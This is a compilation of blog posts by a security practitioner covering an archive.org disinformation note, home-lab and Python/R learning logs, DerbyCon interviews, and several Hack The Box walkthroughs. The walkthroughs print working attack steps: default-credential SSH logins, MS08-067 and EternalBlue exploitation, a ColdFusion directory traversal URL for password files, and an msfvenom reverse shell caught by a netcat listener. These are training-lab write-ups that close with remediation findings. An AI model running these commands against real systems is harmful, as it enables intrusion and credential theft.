So how did these articles come to light and use Archive.org as a mule to spread disinformation? Simple, they exploited a single feature in the Wayback Machine — The Save Page Nowˆfeature. This can be triggered and used to create an alternative link to the article so that if in the case of Sample 1, it gets taken down, it is still shareable.

It appears as something within the Wikipedia Eventstream triggered indexing and saving of sample 2.

Final Conclusion

No good deed goes unpunished. Archive.org was stood up to memorialize parts of the internet for research and leisure purposes, and like anything else, someone has found a way to weaponize it. Be cautious of the links you share and those you see other people sharing. Feel free to use this article to help explain what is off about the pieces and why it is disinformation meant to harm people. As to who those people are, the jury is still out on that one.

I have been collecting old computers from friends and family for some time, and I always said that I was going to stand up a lab. I have finally started to put this in motion. Right now, I have a new (to me) iMac, Dell XPS laptop, and HP laptop (all thanks to Adrian Sanabria) as well as three old HP laptops from my mom and late uncle. I also have an old Toshiba Portege netbook and 2 HP desktop replacement (17” laptops).

Limitations and Interim

Until I buy a proper switch, I am using two old wireless routers (I will flash one with DD-WRT) that I am going to reconfigure to act as switches. I also got a Ubiquiti Edge Router X from Adrian to deploy. I will also be attaching a 2TB and a 6TB external hard drive to systems as network storage. I have two old Apple Xserves, but I need to get RAM and Hard Drives for them (not to mention a rack and better cooling than a home A/C system and a ceiling fan).

My plan as it is right now is to install Ubuntu on each system. I will be running DHCP, DNS (with sinkhole), and NTP from one host (likely the one with the least processing power) and a SEIM on another. I am unsure if I will install GrayLog (h/t Lennart Koopmans maybe I should for namesake alone), OSSIM, or Elastic Search.

Current Home Network Configuration

I am currently using the sub-optimal modem provided by my ISP. I have a Netgear Nighthawk CM1200, but my ISP is not allowing personally owned devices on their 940Mbps connections. Bummer.

I have a Ubiquiti AmpliFi mesh wireless system. I am running two distinct networks on both 2.4 and 5 GHz, one for general computing and the other for IOT toys. I will be using wired connections for the lab.

I also plan to buy a Netgate pfSense appliance to put in-line with my home connection, so that will alleviate some burden off the other systems.

What will I do once I get everything configured and running?

First, I need to replace a few cables (power and USB) then I will retrieve any relevant data then overwrite the hard drives with Ubuntu, I am using 18.04 right now. After that, I will examine distributed computing models for various projects that I am working on in my free time. I am working on beefing up my Python skills and want to learn more about Machine Learning and Natural Language processing, which both tie into my current project, the DECEPTICON Bot (more details on that soon).

I may also do some research with Go as well. I don’t want to experiment with Blockchain or Cryptocurrency right now, so I would need to find another good use of lightweight code and inexpensive devices.

I plan to do some security research (offensive and defensive) as well as more ML, NLP, and other buzz word research.

That’s all I have got for now. Stay tuned for the next installment.

After one week of research and trial and error, I have some more progress to publish/report. I started the week by installing the packages used in the books that I am reading. I wrote a simple shell script to install them all:

#!/bin/bashapt-get update -y;apt-get upgrade -y;apt-get install python-pip python3-pip python-bs4 python3-bs4;apt install apt-transport-https software-properties-common;sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys E298A3A825C0D65DFD57CBB651716619E084DAB9;sudo add-apt-repository 'deb https://cloud.r-project.org/bin/linux/ubuntu bionic-cran35/';apt-get update -y;apt-get install r-base;apt install gdebi-core;wget  https://download1.rstudio.org/desktop/bionic/amd64/rstudio-1.2.5019-amd64.deb;gdebi  rstudio-1.2.5019-amd64.deb;pip install -r requirements.txt;pip3 install -r requirements.txt;echo "Installation Complete!"

The requirements.txt file is the actual Python packages to install. Here is that file:

requestsjupyterlabnumpytensorflowscikit-learnnltkpandasmatplotlibrebs4

Since the Machine Learning and Natural Language Processing books are longer with longer chapters, I am currently pacing myself to complete one section per week right now. This allows me to ingest more material across multiple disciplines while continuing to make progress with my book, write other blogs, and hold down my day job.

Python Learning

Natural Language Processing

Starting with the other NLP, Natural Language Processing, not Neuro-Linguistic Programming, I installed the Natural Language Toolkit (nltk). At first, I was running the commands from the book in the python3 interpreter; then, I decided to write some scripts and save them as files.

At the beginning of this book (Natural Language Processing with Python), I am spending a lot of time using the sample dataset from the nltk, which can be installed via:

from nltk.book import *

This provides nine different literary works to analyze. The book starts with basic math and arithmetic. Next is starting to analyze the words within the files (named text1-text9). We begin by creating a concordance, which is a list of specific words used in alphabetical order and number of occurrences. I can see where this will be important in later projects because of the context this provides. To get a concordance of a file:

<filename>.concordance("<word_searched_for")

We can also do a similar search with the word similar instead of concordance. This will find words like the one searched for. I ran this with the word “gazed” and it showed me lines (with the context) containing the phrase “stared” and “discovered.”

Using common_context, we can see instances where the words share a similar context.

<filename>.common_context(["<word1>", "<word2>"])

Here is where things could get scary. The generate function. It will analyze the text input and create a passage of its own using ngrams. Imagine the possibilities for this if using it for disinformation, deception, or deep fakes.

Next, we work with the len() command to determine the length of our text. We then move to sorting using sorted() and counts of occurrences of words. We can accomplish this via:

<filename>.count("<word>")

Next, we get into lists: creating them, adding two lists together, and appending to them. We move into indexing lists via:

<filename>.index("<word>") Indexes for the word <word>.<filename>[8675309:] Indexes all items in the list after 8675309 (note the list starts at 0).<filename>[:8675309] Indexes all items in the list before (not including) 8675309 .<filename>[867:5309] Indexes all items in the list from item 867 to 5308.<filename>[6] Item number 6 in the list.

Modifying Lists:<list>[6] = 'six' Will write 'six' as the 6th item in the list or replace the 6th item with 'six'

Next up is variables then strings. We start working with Frequency Distribution (this could come in handy with password cracking BTW). This works through the frequency of the words, the length of the words, and a combination of the two. This is accomplished using the FreqDist package within nltk.

The next section has me working with Python logic and conditionals.

<      Less Than<=     Less Than or Equal To==     Equal To!=     Not equal To>      Greater Than>=     Greater Than or Equal To

Conditional patterns of use are:

<name>.startswith(<letter>)<name>.endswith(<letter>)<letter> in <name><name>.islower() Checks if all characters are lowercase <name>.isupper() Checks if all characters are uppercase<name>.isaplha() Checks if all characters are alphabetic<name>.isalnum() Checks if all characters are alphanumeric<name>.isdigit() Checks if all characters are digits (numbers)<name>.istitle() Checks if all characters are in Title Case (All initial capitals)

Here is an example where I input a chapter of my upcoming book into the interpreter and looking for words ending in “ishing:”

>>> sorted([w for w in set(book) if w.endswith('ishing')])['Phishing', 'accomplishing', 'phishing', 'vishing']

This could be useful in determining variations that people use on passwords.

Machine Learning (with SciKit-Learn and Tensorflow)

Much of the first chapter of the book (Hands-On Machine Learning with Scikit-Learn and Tensorflow) is indoctrination to how Machine Learning works. This takes us through supervised and unsupervised learning, data quality, underfitting vs overfitting, instance-based learning versus model-based learning, and batch versus online learning to name a few.

I didn’t really write any code or learn anything relevant to python in this chapter. To me, this was a solid refresher in what I learned while working on a graduate certificate. I was able to pick up where I left off with aspects of cluster analysis and regression, which was a relief in a sense.

Conclusion

Next week is a busy week. In addition to my day job, I will be on an ITSP Magazine podcast on Monday and Paul’s Security Weekly on Thursday as part of a penetration testing panel. I hope to meet my self-imposed quotas, but we will see where I land. I will check back in next week.

AT&T Cybersecurity (formerly AlienVault), published my Which Security Certification Is Right For You (if any) this week. I have upcoming pieces about to be released by TripWire and ITSP forthcoming, both of which have a Home Alone theme. Stay tuned for those. I will also be writing something for work, so watch out for that as well.

After one week of research and trial and error, I have some progress to publish/report. I started the week by getting back into the R Programming language. I am using a short book from Packt Publishing, Social Media Mining with R as a primer. I also have R for Dummies (2012 edition) and Learning R (2013), but I am focusing on the small book as of now for three reasons: a) R is not the primary language I will be using; b) it is shorter and a relevant primer; and c) the other books are more recent.

The first two chapters (my self-imposed assignment for this book this week) start with leveling about data science, big data, and statistic analysis in the first chapter then the fundamentals of R in the second chapter. The fundamentals covered basic arithmetic, functions, vectors, variables, importing data, and basic use.

For example, to install packages in R, a simple command as such is issued:

install.package("<package_name>", dependencies=True)

This is similar to Python’s pip utility. To get pip, issue one (or both) of the commands below on a Debian or Ubuntu-based Linux host (based on which version of Python you are using):

apt-get install python-pipapt-get install python3-pip

Then to use pip to install a package for Python from Python Package Index (PyPI), issue this command (showing both pip and pip3 for instances where people may be running Python2 and Python3):

pip install <package_name>pip3 install <package_name>

Back to R. Setting a working directory can save a lot of headaches.

setwd("<full/path/to/directory>")

So to set it to Joe’s Windows or Linux home directory, we would issue the following commands:

Windows: setwd("C:\Users\Joe\R_Working_Directory")Linux: setwd("/home/Joe/R_Working_Directory")

Let’s Load a sample CSV file from the computer.

myfile <- read.csv("path/to/file"

If we wanted to load a file from the internet, substitute the path with the full URL (including http:// or https://).

Once we have the file loaded in R, we can analyze it.

Something notable about R:

The = operator is not used to set variables. <- is.

mydata = data is incorrect.mydata<- data is the correct syntax in R. 

That’s it for what I have learned so far. Next week, I will be covering Mining Twitter with R and the pitfalls of social media.

It’s been a while since I published anything. I have been getting acclimated to my new position as a Senior OSINT Specialist at QOMPLX, as well as several other exciting things. I competed in the Trace Labs Missing Persons CTF at HackFest in Quebec City, Quebec(with Jos, MayGoogleForYou, and Isabella Ballerina as the Password Inspection Agency) and we got a close 2nd place, almost 1st. Still, we couldn’t hammer down a couple of details, but that is okay. I often say that this is the only CTF that matters. I also got 2nd place in the Social Engineering CTF, despite not speaking much French beyond Parlez vous Anglais?.

Aside from traveling to Rhode Island in mid-December for a roundtable with Paul’s Security Weekly, I am done traveling for the year to speak. Thus far, I only have one confirmed engagement in 2020 — Teaching my EC-Council OSINT and Social Engineering Workshop at AppSec California (January 21, 2020 — register here). I will also be helping judge a Trace Labs Missing Persons CTF in December, remotely.

I am also about to resume Hack the Box activity, so the walkthroughs will continue. I also plan on finishing OSCP before the end of May. I am currently doing some research in the Missing Persons space, both in the Trace Labs slack and independently, and I want to finish that research first.

My Conundrum

I feel like I have hit a brick wall when it comes to having material to talk about on a stage to my peers that are a) possibly taking time off work to hear the talk; and/or b) may have paid to attend the conference/presentation. To this end, I have decided to push myself outside my typical comfort zones of OSINT, Social Engineering, and Forensics. I have set off on a journey to learn more Python. Specifically, more Python as it relates to Machine Learning, Natural Language Processing (the other NLP), web scraping, and statistic analysis. I am coupling the R programming language into my research in statistic analysis.

To set the tone, I have some formal graduate-level education in Business Intelligence/Big Data/Applied Statistics. I am familiar with CRISP-DM (Cross-Industry Standard Process for Data Mining) as well as the ethics, quantitative and qualitative methodologies (as well as mixed-method), sampling, and methods to minimize or eliminate bias in data sets.

While my day job has me working on some things relative to OSINT in this capacity, I want to push myself to learn and produce more. The purpose of this post is to share with you what I am working on in terms of learning and any open-source tools I create. I also hope to solicit ideas, advice, and feedback in what would be impactful to the community while also stimulating learning on my accord. To a degree, I am seeking ideas for 2020’s talks from the community.

Ideas

I have submitted one talk for 2020 thus far. Not because I don’t want to speak, although I am trying to slow down on the speaking and travel. I feel like I don’t have anything new or disruptive enough to hop on a stage in front of an audience and present. I want to do something with some OSINT or Social Engineering automation within reason. I would also like to expand on my DECEPTICON idea (disinformation and deception for OPSEC/Anti-OSINT). The lack of ideas is where I am drawing the most significant blank.

I am also considering getting my Private Investigator’s License.

Research Method

I am challenging myself to read between 1 and 3 chapters (depending on outside events, workload, and length/depth of the sections) of each of the following books (Note: the links will Donate to the Rural Tech Fund via Amazon Smile)

https://smile.amazon.com/Mastering-Social-Media-Mining-Python

https://smile.amazon.com/Social-Media-Mining-Nathan-Danneman/dp/1783281774/

https://smile.amazon.com/Mining-Social-Web-Facebook-Instagram/dp/1491985046

https://smile.amazon.com/Natural-Language-Processing-Python-Analyzing/dp/0596516495/

https://smile.amazon.com/Hands-Machine-Learning-Scikit-Learn-TensorFlow/dp/1491962291/

As I progress through the books, I plan to marry ideas and create tooling, presentations, and other things of use. I may even create some training sessions on topics and aspects that I can master. I will share anything that I make public via Twitter and here.

The Book

The book, tentatively titled Practical Social Engineering, is coming along well. I have made it through the editorial process with almost eight chapters. I plan on having 14 plus appendices, so I am a little over halfway (less the technical review and edits there). I do not have a tentative release date yet, but working with NoStarch Press has been a fantastic experience. Bill and his team (namely Frances) are nothing short of AMAZING!

Training

I have several training sessions planned. Check out the list here. Use coupon code BLACKFRIDAY for a 50% discount (valid through December 31). Courses offered include (numerous sessions for each):

Regular Expressions (REGEX) for Offense, Defense, and OSINT

Introduction to People OSINT/Missing People OSINT

Basic OSINT (4-hour Version)

Conclusion

I hope you are doing well. I wish you a great holiday season (for whichever holiday(s) you may celebrate). Feel free to DM me (@C_3Pjoe on Twitter) with any ideas you may have.

I sat down with Nicole Schwartz to talk about her involvement and memories of DerbyCon.

Nicole attended many years of DerbyCon, with DerbyCon 3 being her first. It is one conference that she has attended solely as an attendee. For the final DerbyCon, she was a speaker (more on that later in this article) and in previous years, she has helped with resume review.

Through her presentation, (embedded below) she provided security people ideas on how to use DevSecOps to their advantage. Her hope is that attendees leave with at least one new idea of how to do DevSecOps better — this might be ideas around tools (like GitLab), or programs (like growing agile advocates) or even just getting a plan ready for what would be a small tool or process to automate if engineering gets on board to help them reduce their risk.

When asked about community resources to share, Schwartz had no shortage of delights to share, even going as far as to preface the question with a question in terms of a limit. She is staff for The Diana Initiative, staffed Defcon SkyTalks for a few years. With MzBat and Lesley Carhart, she volunteers to help to coordinate the Career workshops at conferences and wants the community to know that the resume review and mock interview clinic format is open source and other people should do at events!

Schwartz tries and does hackerswan, hackerfoodies, and hackerconticketexchange herself. She has helped sylv3on do the ladies of Defcon meetup this past year and the WAN party discord, which, with others, she is trying to grow and improve a WAN party or WAN squad (to be more inclusive) meetup at Defcon for next year (Defcon 28). She plans to help with Defconprom.

It is evident that Nicole loves mentoring for talks. The Diana Initiative implemented this in 2019, inspired by BSides Las Vegas Proving Ground. She helped run a scholarship drive to bring 9 students to The Diana Initiative and would like to improve and grow it for next year

Nicole maintains a project or two on advice for those hosting conferences to level up their inclusivity, tips, and tricks for doing CFPs, and advice for first-time speakers and conference-goers. I asked if there was anything else, her response, “and I am sure more, lol, but that's likely too much.” As a passion, she wants to try and grow the community and help so many other people.

Schwartz enjoyed DerbyCon for the friendly Hyatt staff (like Kelly, who notably received a DerbyCon Black Badge during the closing ceremony) and chose to stay at the Hyatt this year. She also points out that it was smaller (like ShmooCon) so seeing friends made it worth it. Finally it previously was an event that she could drive to which was great, and lastly, so many of my friends attend.

Her favorite memory, weirdly, Render and Nicole fell in love at DerbyCon. They started at BSides Las Vegas 3 years back, continued the fling through Defcon, then she came to DerbyCon only to hang with him. The outcome? Well, now she’s moving to Canada!

The conversation has been edited and condensed for clarity.

This article is part of a series of articles about DerbyCon IX including interviews with speakers, organizers, and attendees.

About Nicole:

Nicole Schwartz (@CircuitSwan) is a Product Manager for the GitLab Secure team. In her career, she has been in Product, System Administration, and Agile coaching. Before her career ever started she was a Hacker. When she isn’t working, she volunteers at and attends conventions (you may have known her as AmazonV) such as the Diana Initiative and groups like HackerSwan, HackerFoodies, and HackerConTicketExchange.

Contacting Nicole:

Twitter

I sat down with The Blind Hacker, Joe B. to talk about his involvement and memories of DerbyCon.

Joe attended every DerbyCon since DerbyCon 5 (2015). This year, he was a participant and Speaker at DerbyCon. In years past, he went to some talks but mostly villages and chatting, with some CTF action.

This year, he presented a “Stable Talk,” which is a 30 minutes presentation on its own dedicated track. His presentation was Stable Talk 21: Hacking While Blind. When asked what he hopes for people to take away from his talk, he said that he believes that people were able to see just because someone is blind or differently-abled they can still easily do this job, and we can do more to help be more inclusive.

Joe works on a plethora, but he is most proud of his discord community, DeadPixelSec, where they work on many projects, form Mentoring, CTF’s and community outreach.

Regarding his memories of DerbyCon, Joe says that he loved DerbyCon and what it was able to do for people, it was like a family reunion, Everyone was approachable and wanted to chat, could easily go to dinner with strangers and come back friends in just a few short days.

The conversation has been edited and condensed for clarity.

This article is part of a series of articles about DerbyCon IX including interviews with speakers, organizers, and attendees.

About Joe:

A long-time hacker, info-sec enthusiast, Mentor. The Blind Hacker has volunteered to read over resumes and do mock interviews as well as mentor anyone who asks. As a person with a disability, he has never let it slow him down.

Contacting Joe:

Twitter
Twitch
DeadPixelSec Discord

Hostname: Mirai
IP: 10.10.10.48
Operating System: Linux

Port Scan Results*

A simple nmap port scan nmap -vvvvv 10.10.10.48 yields the following ports:

22/tcp: ssh
53/tcp: domain
80/tcp: http

Further Enumeration*

Let’s go a little deeper with version numbers. We know it’s a Windows system and the name is a hint of sorts it seems. I use nmap -vvvvv -A -sVT 10.10.10.4.

22/tcp: OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
53/tcp: dnsmaq 2.76
80/tcp: lighttp 1.4.35

Methodology

Updated port scan and enumeration information:
22/tcp: OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
53/tcp: dnsmaq 2.76
80/tcp: lighttp 1.4.35

Let’s take a look at the website before we attempt exploitation.

Hmmm…nothing in the page source. Let’s see what gobuster can find.

gobuster dir -u http://10.10.10.48 -w /usr/share/dirb/wordlists/common.txt

Interesting, A Pi-hole. Using the name of this system as a hint, Mirai botnet logged into systems using default credentials. A quick search for default raspberry pi credentials landed me the combination of pi:raspberry from here. Let’s check to see if this is correct here using Medusa:

medusa -h 10.10.10.48 -u pi -p raspberry -M ssh

That works! Now, let’s try to login via SSH. ssh pi@10.10.10.48

Now let’s see who we are and if we can sudo.

Okay, we have sudo, so the path to root should be easy. Let’s get user first.

We’ll cd ~ then move to Desktop (could also cd ~/Desktop).

There’s user! Now, let’s sudo bash then move to root.

That’s not a flag (in the correct format)! Let’s check the USB Stick. We can check 3 directories for mounted external drives: /dev, /mnt/, and /media. Let’s check /mnt first.

Nothing here, let’s check /dev. Quite a bit here. /dev/sdb is normally where a USB Stick may be. Let’s read this file

It’s a mangled mess. Let’s note the /media/usbstick mention and scroll down.

That’s dirty, but it looks like a flag.

Note: Alternatively, we could have used strings on the file to see this more cleanly.

That’s all she wrote.

Findings, Sample Code, and Flags

Finding 1: The Mirai system is using default credentials that are publicly accessible on the internet.

Finding 2: The ‘pi’ user that is a default account is enabled under the same name.

Finding 3: The ‘pi’ user has sudo permissions.

Additional Actions

None.

High-Level Summary and Recommendations

C_3PJoe (the adversary) was commissioned to perform a penetration test of the host Mirai (the victim) in an effort to see what vulnerabilities existed within the system and determine what paths to exploitation existed. Through using default credentials (user name: pi, password: raspberry), C_3PJoe was able to gain access to the user as pi.

Once on the system, pi had sudo permissions that enabled the adversary to escalate to root-level permissions.

Recommend disabling default accounts and changing default passwords.

Tools Used

nmap
SearchSploit
Medusa
SSH

Other Walktroughs:

Blue
Lame
Arctic
Legacy

Hostname: Legacy
IP: 10.10.10.4
Operating System: Windows

Port Scan Results*

A simple nmap port scan nmap -vvvvv 10.10.10.4 yields the following ports:

139/tcp: netbios-ssn
445/tcp: microsoft-ds
3389/tcp: ms-wbt-server (terminal services aka Remote Desktop or RDP)

Further Enumeration*

Let’s go a little deeper with version numbers. We know it’s a Windows system and the name is a hint of sorts it seems. I use nmap -vvvvv -A -sVT 10.10.10.4.

139/tcp: Microsoft Windows netbios-ssn
445/tcp: Microsoft Windows XP microsoft-ds
3389/tcp: ms-wbt-server (conn-refused)

Windows XP with SMB, this can typically mean only one thing in HTB or a CTF: MS08–067!

Let’s see if we can get anything from smbclient:

That was a bust, let’s see what Searchsploit has to offer via searchsploit 08–067

Methodology

Updated port scan and enumeration information:
139/tcp: Microsoft Windows netbios-ssn
445/tcp: Microsoft Windows XP microsoft-ds
3389/tcp: ms-wbt-server (conn-refused)

Now that we see MS08–67 in Searchsploit, let’s try this. cp /usr/share/exploitdb/exploits/windows/remote/40279.py ./ then execute it via python 40279.py

Now we target our host with python 40279.py 10.10.10.4 1

Nothing seems to have happened. Let’s try msfconsole. We’ll execute search 08–067 to find modules for this then select (use 0) to enter our targeting information.

Set the host (set rhost 10.10.10.4) and let’s run this.

Oops. Let’s set target 6 for XP SP3 English.

We have SYSTEM, which is root/administrator level. Let’s get the user flag first.

There it is! Now, let’s move to Administrator.

Whew, we’re done.

Findings, Sample Code, and Flags

Finding 1: The Legacy system is running Windows XP SP3, which is well beyond end of life (EOL).

Finding 2: The version of Windows XP running has a significant vulnerability in Server Message Block (SMB) that allows remote attackers to exploit the vulnerability and gain SYSTEM level access.

Additional Actions

None.

High-Level Summary and Recommendations

C_3PJoe (the adversary) was commissioned to perform a penetration test of the host Legacy (the victim) in an effort to see what vulnerabilities existed within the system and determine what paths to exploitation existed. Through using an out of date operating system (Windows XP), which all support was discontinued in 2014, the adversary was able to execute an exploit against a vulnerability in the Windows operating system to gain full SYSTEM access.

The adversary recommends implementing a verbose vulnerability management program to patch the operating systems and software on the systems. Furthermore, it is recommended that all software, particularly public-facing web servers use the latest stable release of available software.

Specific upgrades recommended are Microsoft Windows 10 or above.

Tools Used

nmap
smbclient
msfconsole ( Metasploit Framework)
SearchSploit

Other Walktroughs:

Blue
Lame
Arctic
Mirai

Hostname: Lame
IP: 10.10.10.3
Operating System: Linux

Port Scan Results*

A simple nmap port scan nmap -vvvvv 10.10.10.3 yields the following ports:

21/tcp: ftp
22/tcp: ssh
139/tcp: netbios-ssn
445/tcp: microsoft-ds

Further Enumeration*

This initial port scan didn’t give us much. We need to approach this with a three-pronged attack. 1: amp up our nmap, 2: look at the actual website, and 3: go snooping through the directories.

For the next part of enumeration, I attempt a service version scan using nmap nmap -vvvvvv -sTV 10.10.10.40.

That gave some service versions.

21/tcp: ftp vsftpd 2.3.4
22/tcp: ssh OpenSSH 4.7p1 Debian 8ubutunu1 (protocol 2.0)
139/tcp: Samba smbd 3.x-4.x (Workgroup: WORKGROUP)
445/tcp: Samba smbd 3.x-4.x (Workgroup: WORKGROUP)

Nope! Let’s check nmap FTP scripts and then SMB.

Nothing by way of the FTP nmap scripts. On to SMB.

Hmmmm…let’s do some nmap enumeration and come back to this. Let’s find out what nmap has in the scripting engine via ls -la /usr/share/nmap/scripts | grep smb. Good Selection.

Boo, hiss, none of them work. Let’s see if we can get anything else from enum4linux.

Winner, winner, Chicken dinner.

Let’s see what we can connect to (namely the \\10.10.10.3\tmp share.)

Not much luck here. Let’s check searchSploit for the specific version of Samba via searchsploit samba\ 3.0.20

Methodology

Updated port scan and enumeration information:

21/tcp: ftp vsftpd 2.3.4
22/tcp: ssh OpenSSH 4.7p1 Debian 8ubutunu1 (protocol 2.0)
139/tcp: Samba smbd 3.0.20
445/tcp: Samba smbd 3.0.20

Here are our options.

It doesn’t look like we have many options. It’s late, let’s use Metasploit.

We find the module associated with our version (usermap script). Input RHOST, Payload, LHOST, and LPORT then run.

OOOOOH. whoami says we are root. Let’s go for the gold and get out of here.

Root before user??! Wowee!

Findings, Sample Code, and Flags

Finding 1: An outdated version of Samba was installed and open without filtering on the network, allowing the adversary to use a CVE from 2007 to compromise the host.

Additional Actions

None.

High-Level Summary and Recommendations

C_3PJoe (the adversary) was commissioned to perform a penetration test of the host Lame (the victim) in an effort to see what vulnerabilities existed within the system and determine what paths to exploitation existed. Through using outdated SAMBA (file sharing) software, the adversary was able to use a public exploit from 2007 to gain administrative access.

From here, the adversary was logged in as root (Administrative permissions) and could have effectively taken the system completely over or used it to pivot to other hosts.

The adversary recommends implementing a verbose vulnerability management program to patch the operating systems and software on the systems.

Specific recommendations include following the guidance from the Common Vulnerabilities and Exposures (CVE) found here and updating SAMBA to the latest stable release (4.10.7) available here.

Tools Used

nmap
ftp
smbclient
enum4linux
SearchSploit
Metasploit

Other Walktroughs:

Arctic
Blue
Legacy
Mirai

Hostname: Blue
IP: 10.10.10.40
Operating System: Windows

Port Scan Results*

A simple nmap port scan nmap -vvvvv 10.10.10.40 yields the following ports:

135/tcp: msrpc
139/tcp: netbios-ssn
445/tcp: microsoft-ds
49152/tcp: unknown
49153/tcp: unknown
49154/tcp: unknown
49155/tcp: unknown
49156/tcp: unknown
49157/tcp: unknown

Further Enumeration*

This initial port scan didn’t give us much. We need to approach this with a three-pronged attack. 1: amp up our nmap, 2: look at the actual website, and 3: go snooping through the directories.

For the next part of enumeration, I attempt a service version scan using nmap nmap -vvvvvv -sTV 10.10.10.40.

That gave some service versions.

135/tcp: Microsoft Windows RPC
139/tcp: Microsoft Windows netbios-ssn
445/tcp: Microsoft Windows 7–10 microsoft-ds (Workgroup: workgroup)
49152/tcp: unknown
49153/tcp: unknown
49154/tcp: Microsoft Windows RPC
49155/tcp: Microsoft Windows RPC
49156/tcp: Microsoft Windows RPC
49157/tcp: Microsoft Windows RPC

Ignoring the hint in the hostname, let’s see if there is any manual enumeration via RPC.

Nope! Let’s check SMB.

Let’s see if we can get anything from enum4linux, nada.

Methodology

Reiterated port scan and enumeration information:
135/tcp: Microsoft Windows RPC
139/tcp: Microsoft Windows netbios-ssn
445/tcp: Microsoft Windows 7–10 microsoft-ds (Workgroup: workgroup)
49152/tcp: unknown
49153/tcp: unknown
49154/tcp: Microsoft Windows RPC
49155/tcp: Microsoft Windows RPC
49156/tcp: Microsoft Windows RPC
49157/tcp: Microsoft Windows RPC

Now, we can see from our enumeration that RPC seems to be a no-go. Let’s have a look at what nmap can find for RPC and SMB.

RPC is continuing to give us jack and squat. Let’s see what we can do with SMB.

Being a little lazy, I used nmap -p139,445 --script=smb-enum-*

Let’s be punny, take the bait for the hostname hint, and put on our Blue Suede Shoes.

searchsploit eternal\ blue

Let’s try this code that we got via cp /usr/share/exploitdb/exploits/windows/remote/42031.py ./

Oops, we may need some shellcode first. Let’s use wget to score those. wget https://raw/githubusercontent.com/offensive-security/exploitdb-bin-sploits/master/bin-sploits/42030.asm and wget https://raw/githubusercontent.com/offensive-security/exploitdb-bin-sploits/master/bin-sploits/42031.asm

Let’s try this.

Nope. Instead of researching why, I had an itch to pwn, so I used metasploit via msfconsole. Let’s search using 17–010 as our parameter.

We know it’s a Windows 7 host, so let’s use exploit/windows/smb/ms17_10_eternalblue.

Set the RHOST, Payload, LHOST, and LPORT and hit run.

BOOM! No need to further enumerate in this context, we are
nt authority\SYSTEM. Get the user flag.

Change directories and get the root flag. Done!

Findings, Sample Code, and Flags

Finding 1: Microsoft Server Message Block 1.0 (SMBv1) is vulnerable to exploitation and has not been patched. This allows a malicious adversary the ability to log in with elevated privileges remotely.

Additional Actions

None.

High-Level Summary and Recommendations

C_3PJoe (the adversary) was commissioned to perform a penetration test of the host Blue (the victim) in an effort to see what vulnerabilities existed within the system and determine what paths to exploitation existed. Through using unpatched software, the adversary was able to use a public exploit (ETERNAL BLUE) to gain administrative access.

From here, the adversary was logged in as nt authority/SYSTEM (Administrative permissions) and could have effectively taken the system completely over or used it to pivot to other hosts.

The adversary recommends implementing a verbose vulnerability management program to patch the operating systems and software on the systems.

Specific recommendations include following the guidance from Microsoft found here.

Tools Used

nmap
rpcclient
smbclient
enum4linux
SearchSploit
Metasploit

Other Walktroughs:

Arctic
Lame
Legacy
Mirai

Hostname: Arctic
IP: 10.10.10.11
Operating System: Windows

Port Scan Results*

A simple nmap port scan nmap -vvvvv 10.10.10.11 yields the following ports:

135/tcp: msrpc
8500/tcp: fmtp*
43154/tcp: unknown.

Further Enumeration*

I like to start Microsoft based systems enumerations with RPC and SMB. Seeing as this system only has RPC, let’s try that first. (Note: Joff Thyer over at Black Hills Infosec has a GREAT blog about password spraying using RPC.)

No Bueno!

For the next part of enumeration, I attempt a service version scan using nmap nmap -vvvvvv -sV 10.10.10.11. That didn’t give me much, aside from telling me that 49154/tcp was also for msrpc.

Updated port scan results:
135/tcp: msrpc
8500/tcp: ftmp*
49154/tcp: msrpc

I think about port 8500, initially confusing it with 5900 (VNC), but decide to take a look and a simple Google search said ColdFusion.

Bazinga!

Let’s kick off dirb to automate some findings while we poke around.

dirb http://10.10.10.11:8500 /usr/share/dirb/wordlists/vulns/coldfusion.txt

Voila! We have not only positively fingerprinted this as ColdFusion, but we can also find the login page.

Methodology

Updated port scan and enumeration information:
135/tcp: msrpc
8500/tcp: ColdFusion8
49154/tcp: msrpc

Now, we can see from our enumeration that rpc seems to be a no-go. Let’s focus on ColdFusion8. There are two ways to see where to go from here (without using Metasploit — I am attempting to avoid it to better prepare for the constraints of OSCP). First, we can query SearchSploit via searchsploit coldfusion\ 8 or we can search Exploit-db. Let’s do both.

We see a directory traversal vulnerability, but it only has Metasploit support. Let’s check the website.

This entry says that if we manipulate the login page to http://server/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en, we can perform directory traversal and possibly read other files. Hmmm. This could work to gain access to /etc/passwd and /etc/shadow if this were a Linux machine, but it is Windows. Let’s see what the string included gives us.

I like to use Crackstation to attempt password cracking, so let’s try that.

BOOM!

Let’s login and take a look around to see what there is to see. Since this is for pwnage, let’s look for opportunities to upload files.

Now we know where and how to upload files, what kind of shell do we use? We should probably take a look at what ColdFusion is written in. I was a bit lazy, but I validated through Wikipedia (this is not a peer-reviewed, academic paper). Java. Hmmmm….

We could use the built-in shells from Kali, or we could make our own. I am feeling adventurous, let’s make our own file in msfvenom. First, let’s see what is available for Java.

Ahhh. There is some Java. I like to use Teenage Mutant Ninja Turtle names for shells. Let’s go with Don, short for Donatello.

Let’s upload it and prepare for execution.

We configure the location for the file to hosted (green arrow; C:\ColdFusion8\wwwroot\CFIDE\don.jsp) and the location to pull the file from (red arrow). To get it there, we will need to run a Python SimpleHTTPServer (python -m SimpleHTTPServer 80) in the directory with the file. (Note we must declare port 80, other SimpleHTTPServer will listen on Port 8000).

Next, we set up a netcat listener on the 1337est port, 1337 using nc -nlvp 1337

Let’s wee what’s here, nothing to write home about, but we have a shell.

Let’s get the user flag.

Wha-BAM! Now, let’s get some more information about the system so we can pwn for root. the systeminfo command is a good way to do this. (Note: this will help tremendously in a few minutes with the Windows Exploit Suggester).

Let’s dump the systeminfo into the Windows Exploit Suggester. Trial and error is the best way to validate this information. In some cases, you may have to complile the executables, in others, it may require user intervention (which does not jive in HTB, CTFs, or OSCP). I like the looks of MS10–059.

A quick search on GitHub, find this, with the executable already compiled (work smarter, not harder).

Let’s copy this down (I copied into the /opt directory) via:

cd /opt
git clone https://github.com/egre55/windows-kernel-exploits
cd windows-kernel-exploits/MS10–059: Chimichurri/Compiled
cp Chimichurri.exe ~/Documents/HTB/arctic/

Now, we need to get the file on Arctic. I tried in the directory we start in, but to no avail, so I moved up 2 levels to C:\ColdFusion8. Now we have to great a makeshift wget.

